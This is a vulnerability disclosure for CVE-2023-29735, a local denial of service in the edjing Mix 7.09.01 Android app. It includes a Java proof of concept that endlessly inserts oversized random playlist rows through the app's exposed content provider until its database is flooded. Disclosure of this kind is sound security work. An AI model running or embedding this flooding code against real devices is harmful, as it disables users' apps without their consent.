Headline
CVE-2023-29735: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.
Denial of Service exists in edjing Mix(CVE-2023-29735)
Vendor:MWM(http://www.edjing.com/)
Affected product:edjing Mix(com.edjing.edjingdjturntable)
Version:7.09.01
Download link:https://play.google.com/store/apps/details?id=com.edjing.edjingdjturntable
Description of the vulnerability for use in the CVE:An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.
poc:
public void attack(){ int num = 2; while (true) { ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); String randomString =getRandomString(52); String randomString2 =getRandomString(5120); Uri uri = Uri.parse(“content://com.edjing.edjingdjturntable/playlist”); ContentValues contentValues = new ContentValues(); contentValues.put("playlist_id",num); contentValues.put("playlist_date_modified",1314234); contentValues.put("playlist_date_added",123456); contentValues.put("playlist_state",0); contentValues.put("playlist_name",randomString2); contentResolver.insert(uri,contentValues); num ++; } }
public static String getRandomString(int length) { String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; Random random = new Random(); StringBuffer sb = new StringBuffer(); for (int i = 0; i < length; i++) { int number = random.nextInt(62); sb.append(str.charAt(number)); } return sb.toString(); }